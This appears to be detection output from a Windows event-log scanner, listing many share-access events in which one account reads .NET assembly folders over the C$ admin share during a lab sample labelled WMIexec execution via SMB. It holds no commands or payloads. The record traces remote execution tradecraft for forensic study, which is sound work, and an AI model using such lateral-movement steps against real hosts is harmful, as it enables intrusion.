20:32:29.542 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.542 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\GAC_MSIL\System.Management.Automation.Resources : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.542 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\GAC_MSIL\System.Management.Automation.Resources\1.0.0.0_en_31bf3856ad364e35 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.542 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.557 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Accessibility : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.557 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Accessibility\9c87f327866f53aec68d4fee40cde33d : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.557 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\AuditPolicy42d3d2cc# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.557 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\AuditPolicy42d3d2cc#\93e4ea0bbfb41ae7167324a500662ee0 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.573 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\ComSvcConfig : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.573 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\ComSvcConfig\b22b9bfb4d9b4b757313165d12acc1b1 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.573 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\CustomMarshalers : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.573 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\CustomMarshalers\3028a8133b93784c0a419f1f6eecb9d7 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.589 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\dfsvc : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.589 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\dfsvc\caea217214b52a2ebc7f9e29f0594502 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.589 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\EmbeddedLockdown : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.589 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\EmbeddedLockdown\d890cdf716b288803af7c42951821885 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.589 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\EventViewer : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.589 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\EventViewer\508676af4bc32c6cdfa35cb048209b2a : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.589 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\ipamapi : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.589 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\ipamapi\893f9edeb6b037571dca67c05fad882e : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.589 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.A3ec156ec# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.589 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.A3ec156ec#\b8fd553238ff003621c581b8a7ab9311 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.604 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.A26c32abb# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.604 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.A26c32abb#\f51b67a5b93d62c5a6b657ebfd8cdaea : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.604 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Abf69f55a# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.620 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Abf69f55a#\077014d070d56db90f9a00099da60fa8 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.620 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.B22c61a69# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.620 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.B22c61a69#\a8aada24560f515d50d1227a4edb9a68 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.620 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.B46c55d17# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.620 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.B46c55d17#\a3f0de129553f858134a0e204ddf44c3 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.642 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.B83e9cb53# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.642 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.B83e9cb53#\b2eb2f250605eb6b697ed75a050e9fa1 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.652 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.B3325a29b# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.652 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.B3325a29b#\2d63d4f586d1192cb1d550c159a42729 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.652 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Baa2ca56b# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.652 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Baa2ca56b#\71d44db8d855f43bafe707aabf0050d7 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.652 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Bfc9dc24d# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.652 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Bfc9dc24d#\d33525eb35c4aa8b45b1e60e144e50ab : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.683 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Build : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.683 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Build\d6c8ca8dfe9cd143210459e72a546bf8 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.683 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.C8d726d22# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.683 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.C8d726d22#\95eb335a0d6884a4b311ce7041f71bc3 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.699 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.C25dcfcb8# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.699 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.C25dcfcb8#\81fd3145ed18f31e338ec4dcb5afd7f7 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.699 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.C26a36d2b# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.699 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.C26a36d2b#\2dab9f12dfcdb3bd487693c1bb12e0a6 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.714 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Ca018eff0# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.714 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Ca018eff0#\4d5abc40df9ad72124f147d1d55dd690 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.714 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.CSharp : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.730 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.CSharp\004d51a9ac1d91d6537ad572591ebbd3 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.730 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.D0ff51f83# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.730 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.D0ff51f83#\b7a83293c2e4f23480fc3660b70099e6 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.730 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.G46fcc235# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.730 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.G46fcc235#\f8fa567f21f9aef0ae471c625b59c159 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.730 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.G91a07420# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.730 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.G91a07420#\5d1b6f60febb9cec91a92675a96ee63d : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.746 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Ga41585c2# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.746 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Ga41585c2#\b101a91893057573f159893cb9c2f28d : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.746 